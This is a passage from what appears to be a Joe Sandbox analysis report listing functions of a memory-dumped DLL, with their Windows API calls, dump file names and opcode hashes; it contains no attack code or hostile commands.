Instruction Fuzzy Hash: 2BF05E355001157BD701EB64DC45EEE73ACEF09360F0091A5F911CB1E0DB74EA858BA1

Function 10005697 Relevance: 4.5, APIs: 3, Instructions: 31synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 100056B1
ReleaseMutex.KERNEL32(?), ref: 100056C9
Sleep.KERNELBASE(00000001), ref: 100056DA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: MutexObjectReleaseSingleSleepWait
String ID:
API String ID: 2685543577-0
Opcode ID: 593a64ed2e79e59b082791af515e515c7d97c51f707634b9aa15c0136f9fabbc
Instruction ID: dded88739cd7db52ccc2d7391d290ba0f31111a6fc9c71b8e083dbddec35d66f
Opcode Fuzzy Hash: 593a64ed2e79e59b082791af515e515c7d97c51f707634b9aa15c0136f9fabbc
Instruction Fuzzy Hash: 06F082302157109BFB109B358C0D79773D8EB046E2F504A59F86AD31E4DBB6B940CAA8

Function 1000D556 Relevance: 4.5, APIs: 3, Instructions: 29synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000D570
ReleaseMutex.KERNEL32(?), ref: 1000D588
Sleep.KERNELBASE(00000001), ref: 1000D590

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: MutexObjectReleaseSingleSleepWait
String ID:
API String ID: 2685543577-0
Opcode ID: 435548193f2fc2d9db74e09c3e0a4e81a4e21e06e2e29fb278ba999a3a509378
Instruction ID: 40aa0b88ac9075472564fd970badd49691fce1c548194cc152243a28c8bc4203
Opcode Fuzzy Hash: 435548193f2fc2d9db74e09c3e0a4e81a4e21e06e2e29fb278ba999a3a509378
Instruction Fuzzy Hash: A4F0A030614E189BEB50AFB48C0969A33E8EB043A6F004705FC66D72D0DF70E800C6A0

Function 10033888 Relevance: 4.5, APIs: 3, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 100338A0

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

std::exception::exception.LIBCMT ref: 100338BC
__CxxThrowException@8.LIBCMT ref: 100338D1

Part of subcall function 100374AB: RaiseException.KERNEL32(?,?,100324BA,?,?,?,?,?,100324BA,?,1005F454,100065DE), ref: 100374FC

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID:
API String ID: 3074076210-0
Opcode ID: ed4abc893698bb5c9891ceb1209db964a45c4fcf2f67754a5fea7d696837269a
Instruction ID: c40b9cdaa8620edb58705369e45bb3f43a5e7579885d0b9e5bbbb9385e176104
Opcode Fuzzy Hash: ed4abc893698bb5c9891ceb1209db964a45c4fcf2f67754a5fea7d696837269a
Instruction Fuzzy Hash: E2E09B7950070AAEDB42EB94DC819EE77BCEF00246F504469F504EE191EF71E648DA61

Function 1001E124 Relevance: 4.5, APIs: 3, Instructions: 26threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(?,00000000), ref: 1001E13D
CloseHandle.KERNEL32(?), ref: 1001E146
CreateThread.KERNELBASE(00000000,00000000,1001D388,?,00000000,00000000), ref: 1001E159

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Thread$CloseCreateHandleTerminate
String ID:
API String ID: 214294483-0
Opcode ID: e2924c68d2b2267d5823fbb3e087017964b0d5ed592416646ef2ebd214186f35
Instruction ID: 6c47360e48e541f40c0052723e9235e3811fbb2456bc37a5d5909ff28a07795f
Opcode Fuzzy Hash: e2924c68d2b2267d5823fbb3e087017964b0d5ed592416646ef2ebd214186f35
Instruction Fuzzy Hash: 93E06DB1401BA4BEE3609B699DC895BBFDCFB05399F04542DF18241910C6B8BC40CF20

Function 100058BF Relevance: 3.1, APIs: 2, Instructions: 113COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100058C4

Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10005A51

Part of subcall function 1001EAC0: GetNativeSystemInfo.KERNEL32(?,93656AD3,0000000F), ref: 1001EB35
Part of subcall function 1001EAC0: HeapCreate.KERNELBASE(00000000,00000000,00000000), ref: 1001EBD0
Part of subcall function 1001EAC0: _free.LIBCMT ref: 1001EC31

Part of subcall function 1001E420: HeapCreate.KERNELBASE(?,?,00000000,00000000), ref: 1001E47F
Part of subcall function 1001E420: _free.LIBCMT ref: 1001E4DD

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CreateHeap_free$Concurrency::details::_Concurrent_queue_base_v4::_H_prologInfoInternal_throw_exceptionNativeSystem_malloc
String ID:
API String ID: 3164855647-0
Opcode ID: 47b4105fe6b3e3161048d5cd8b82993bfb555cfdef2340cd0389ffd279ded10a
Instruction ID: c803a41f29da07c650d3c58594bacb453c4fb1dd27e1a6e1f1a30392c0a1c04b
Opcode Fuzzy Hash: 47b4105fe6b3e3161048d5cd8b82993bfb555cfdef2340cd0389ffd279ded10a
Instruction Fuzzy Hash: A151F3B2802261DED305CF2BCCD1159BFA4FB59314BEA826ED01997A69C7FD5440CF11

Function 10002034 Relevance: 3.1, APIs: 2, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10002039
_memmove.LIBCMT ref: 100020E7

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog_memmove
String ID:
API String ID: 3529519853-0
Opcode ID: 3de3e2a48b5775badc1debb1eaec8da4561501d38b2832b597580eb88c9b2799
Instruction ID: f0bbad769ef49d029823e4ceb201cbe743862221fd5fa22a91b3a39b8f15cb5d
Opcode Fuzzy Hash: 3de3e2a48b5775badc1debb1eaec8da4561501d38b2832b597580eb88c9b2799
Instruction Fuzzy Hash: 4621C471A043069FEB24CF68D84045EB7F5EB842A0B214A2EE856E7286DB31AD41C7A0

Function 1001E420 Relevance: 3.1, APIs: 2, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(?,?,00000000,00000000), ref: 1001E47F

Part of subcall function 1001F4D0: HeapCreate.KERNELBASE(00000000,00000000,00000000,00000004,00000068,1001F266,?,?,?,?,?,000000FF,?,1000D70F,?,10065258), ref: 1001F4F5
Part of subcall function 1001F4D0: _free.LIBCMT ref: 1001F535

Part of subcall function 1001F600: CreateSemaphoreA.KERNEL32(00000000), ref: 1001F67A
Part of subcall function 1001F600: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,00000000), ref: 1001F68E

_free.LIBCMT ref: 1001E4DD

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Create$Heap$Semaphore_free$ErrorFreeLast
String ID:
API String ID: 728542959-0
Opcode ID: 222fa050d65441ebb13fcd7a4239098d54289be2c941337644281796d787a4a5
Instruction ID: 800e16aa3107edb63feffa1116bd34484aa86493a69fc312601903e07da96963
Opcode Fuzzy Hash: 222fa050d65441ebb13fcd7a4239098d54289be2c941337644281796d787a4a5
Instruction Fuzzy Hash: B33110B4405B44DFE360CF64C959B9BBBE4FB04708F008A1DE4AA9B7C1D7B9A548CB91

Function 10025E20 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,93656AD3,?,?,?,10050CCE,000000FF,?,1001EB0B,93656AD3), ref: 10025E61
GetNativeSystemInfo.KERNEL32(?,?,?,?,10050CCE,000000FF,?,1001EB0B,93656AD3), ref: 10025E7C

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 877375556be0117ef64599603d89de48dfc01519870d57c53b358f5f053519b0
Instruction ID: 59a8315101be3ab263f7812ecb0399de6b67e1f0b14bca8f03ae134136496eb9
Opcode Fuzzy Hash: 877375556be0117ef64599603d89de48dfc01519870d57c53b358f5f053519b0
Instruction Fuzzy Hash: 60115E72944258DFDB04CF98ED85BA9B7F8F709714F40466AE80AD3B50D77AA510CF44

Function 1001C213 Relevance: 3.0, APIs: 2, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001C218
GetComputerNameA.KERNEL32(?,?), ref: 1001C273

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ComputerH_prologName
String ID:
API String ID: 2340896887-0
Opcode ID: cc6b2500ecca3743cbec3c9324481d097cb05a05992e836556c9dcd252150570
Instruction ID: 1d68eca033c9043e72de2a4286cf069eb490a1f05f2ee87c86d81987e30c12f2
Opcode Fuzzy Hash: cc6b2500ecca3743cbec3c9324481d097cb05a05992e836556c9dcd252150570
Instruction Fuzzy Hash: 69011AB2D0012DAEDB15DF94D882AEEB7BCEB04344F0040AAA609E3241D7745F888BE0

Function 1001F4D0 Relevance: 3.0, APIs: 2, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00000000,00000000,00000004,00000068,1001F266,?,?,?,?,?,000000FF,?,1000D70F,?,10065258), ref: 1001F4F5
_free.LIBCMT ref: 1001F535

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Heap$CreateErrorFreeLast_free
String ID:
API String ID: 910146552-0
Opcode ID: 0922f84f53244fe7791218adaa3a609704bf451642154910021beb8acc3574b0
Instruction ID: f604b513f122066b879ad4c2375b27ded08a991e1fe4a324105a739978d0ea99
Opcode Fuzzy Hash: 0922f84f53244fe7791218adaa3a609704bf451642154910021beb8acc3574b0
Instruction Fuzzy Hash: D5019DB1200B06ABE3048F25D828B42FBA4BB45309F008219D6448BA80D3FAB568CFD1

Function 1001F7B0 Relevance: 3.0, APIs: 2, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 1001F7D5
_free.LIBCMT ref: 1001F815

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Heap$CreateErrorFreeLast_free
String ID:
API String ID: 910146552-0
Opcode ID: e6d0383cc91ec11f146a235d1bf25ba9ad7322c782b11b51e059047d5a17b778
Instruction ID: 012904b8805aae3dbedbbf78297134198325bffc3ea54a5c621821fb0c9ecd51
Opcode Fuzzy Hash: e6d0383cc91ec11f146a235d1bf25ba9ad7322c782b11b51e059047d5a17b778
Instruction Fuzzy Hash: 0701AFB5200B06ABE304CF25D828B42FBB4FB55309F008219D5448BB80D7FAE468CFD1

Function 100483E9 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

___copy_path_to_wide_string.LIBCMT ref: 100483F8
_free.LIBCMT ref: 10048428

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ___copy_path_to_wide_string_free
String ID:
API String ID: 339592613-0
Opcode ID: 64c3faf5b09213681eb0f59f94c2ded8d5cf0a0c29d89a77047ce6c367243897
Instruction ID: 424f71bbd37a06cd7e57c26e38fcdaf5a0552f039bab1a5dfaedcc90aead64a7
Opcode Fuzzy Hash: 64c3faf5b09213681eb0f59f94c2ded8d5cf0a0c29d89a77047ce6c367243897
Instruction Fuzzy Hash: D2F01C3651010DFFDF028F95DD02DDEBBAAEF093A9F204554FA10A51A0E776DA20EB94

Function 10017A55 Relevance: 3.0, APIs: 2, Instructions: 17networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

closesocket.WS2_32(00000000), ref: 10017A62
WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 10017A6D

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLastclosesocket
String ID:
API String ID: 1278161333-0
Opcode ID: 418d5f1c60f72aecd0ac59fde21019ddb0d4259f61bb1c6b821ef0e2c7ece541
Instruction ID: c10fd3888be95ff44920b7b525900d4ac3c0e5df11b5dd3981ea2acee834d5df
Opcode Fuzzy Hash: 418d5f1c60f72aecd0ac59fde21019ddb0d4259f61bb1c6b821ef0e2c7ece541
Instruction Fuzzy Hash: C0E0EC31400A229BC7109F68E84428A77B1AF45334F61C649E07A865F0C332EDC29A40

Function 10009E53 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 10009E84

Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 36e8143cb793aae47c3215e2a0272e872962c2ef56a3f7046bc436d098895e6f
Instruction ID: 90c222bfae742fec60398cccdc4e1f23cd5be1458402abc6deef91bfde91d8dd
Opcode Fuzzy Hash: 36e8143cb793aae47c3215e2a0272e872962c2ef56a3f7046bc436d098895e6f
Instruction Fuzzy Hash: E2F06771208349AEE354CF69D401B16F7E8EF153A5F20842EE449CB291EBB6E8418BA1

Function 100094E7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 100094FC

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: c39f6b2e62117450a105f5e4cab03e9ceeeea375de70d4d1b1917068cc197d60
Instruction ID: d8f828a40b2b730194e8aba937afc0051e5cb378dd47fda6167a8c8fdc332205
Opcode Fuzzy Hash: c39f6b2e62117450a105f5e4cab03e9ceeeea375de70d4d1b1917068cc197d60
Instruction Fuzzy Hash: 83F058325045139FE712DB1AE840F95F7E4EF907A2B224126E504A71A9CB30BCA1CBE0

Function 10009053 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10009058

Part of subcall function 10009005: __EH_prolog.LIBCMT ref: 1000900A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8f174c59e55ee46aa1a0518bf9910ef7bcc233a2a1d8cc6bb2ecf2f82cef4e6c
